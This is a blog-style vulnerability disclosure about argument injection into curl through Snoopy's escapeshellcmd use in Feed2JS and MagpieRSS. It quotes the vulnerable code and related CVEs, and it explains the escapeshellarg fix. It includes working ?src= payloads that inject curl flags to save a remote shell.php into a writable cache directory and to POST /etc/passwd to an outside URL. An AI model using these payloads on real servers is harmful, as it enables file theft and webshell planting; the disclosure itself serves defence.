Feed2JS is a tool for user-friendly(developer-wise) embedding the RSS
feeds on the pages without messing with XML.

I’ve found out today that it’s vulnerable to local file disclosure
(all your /etc/passwds could be stolen).
It could be used for remote file inclusion as well.

tl;dr – fixed files at the bottom of the post

Feed2JS uses MagpieRSS for parsing the feeds, and MagpieRSS uses
Snoopy library for fetching the documents:

Snoopy - the PHP net client
Author: Monte Ohrt <monte@ispi.net>
Copyright (c): 1999-2000 ispi, all rights reserved
Version: 1.0


Snoopy 1.0 is 12 years old (sic!),6 years ago someone ‘found’ a
vulnerability in Snoopy 1.2.3:

CVE-2008-4796:
The _httpsrequest function (Snoopy/Snoopy.class.php) in Snoopy 1.2.3
and earlier, as used in (1) ampache, (2) libphp-snoopy, (3) mahara,
(4) mediamate, (5) opendb, (6) pixelpost, and possibly other products,
allows remote attackers to execute arbitrary commands via shell
metacharacters in https URLs.

But this was actually discovered 3 years prior to that(9 years ago!):

CVE-2005-3330
The _httpsrequest function in Snoopy 1.2, as used in products such as
(1) MagpieRSS, (2) WordPress, (3) Ampache, and (4) Jinzora, allows
remote attackers to execute arbitrary commands via shell
metacharacters in an HTTPS URL to an SSL protected web page, which is
not properly handled by the fetch function.

As you can see, Snoopy 1.0 is definetely older than v1.2.3, so the
_httpsrequest function should be vulnerable in the Snoopy library used
in Feed2JS, even though I read somewhere that this issue is fixed in
Magpie 0.7.2(it’s not)..

Some code snippets from Feed2JS/Magpie:


extlib/Snoopy.class.inc

/*======================================================================*\
Function: fetch
Purpose: fetch the contents of a web page
(and possibly other protocols in the
future like ftp, nntp, gopher, etc.)
Input: $URI the location of the page to fetch
Output: $this->results the output text from the fetch
\*======================================================================*/

function fetch($URI)
{
$URI_PARTS = parse_url($URI);
switch($URI_PARTS["scheme"])
{
case "https":
$path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : "");
$this->_httpsrequest($path, $URI, $this->_httpmethod);
break;
}
}

/*======================================================================*\
Function: _httpsrequest
Purpose: go get the https data from the server using curl
Input: $url the url to fetch
$URI the full URI
$body body contents to send if any (POST)
Output:
\*======================================================================*/

function _httpsrequest($url,$URI,$http_method,$content_type="",$body="")
{
...
exec($this->curl_path." -D
\"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)."
".escapeshellcmd($URI),$results,$return);
...
}

I cringe every time when I see “exec” functions, so lets check whats
wrong in using it ..

From php.net:

Warning
escapeshellcmd() should be used on the whole command string, and it
still allows the attacker to pass arbitrary number of arguments. For
escaping a single argumentescapeshellarg() should be used instead.

You can pass additional curl arguments (you can check curl manual @
http://curl.haxx.se/docs/manpage.html), for example:

?src=https://example.com/%20-H"something:test"

This code will send something:test in the headers (can be used to get
sensitive information about the server).

You can also download a file and save it locally using curl -o flag.

?src=https://example.com/shell%20-o"cache/shell.php"

this will download https://example.com/shell and save it into cache/
directory (which has 777 permissions by design)

Or you can submit

?src=https://example.com/%20-F%20"file=@/etc/passwd"

to get the /etc/passwd POSTed to your malicious URL and save it using
$_FILES['file'].

Snoopy 1.2.4 is vulnerable as well, so this IS kind-of a
0day(2005-3330 / 2008-4796 wasn't fixed properly)..

Snoopy 1.2.4 ‘fixed’ the CVE-2008-4796 by using quotes around the
escapeshellcmd, but it is still vulnerable, you can exploit it like
this:

?src=https://example.com/"%20-F%20"file=@/etc/passwd

To fix this, you need to use escapeshellarg instead of escapeshellcmd
so that it's only possible to use 1 argument.

Snoopy 1.2.4 also lacks gzip support and messed up the compatibility
with MagpieRSS..

Fixed version of Snoopy.class.inc is here:

https://raw.githubusercontent.com/cogdog/feed2js/master/magpie/extlib/Snoopy.class.inc

P.S. original post at
http://mstrokin.com/sec/feed2js-magpierss-0day-vulnerability-not-really-it-is-actually-cve-2005-3330-cve-2008-4796/

P.P.S should I request a CVE?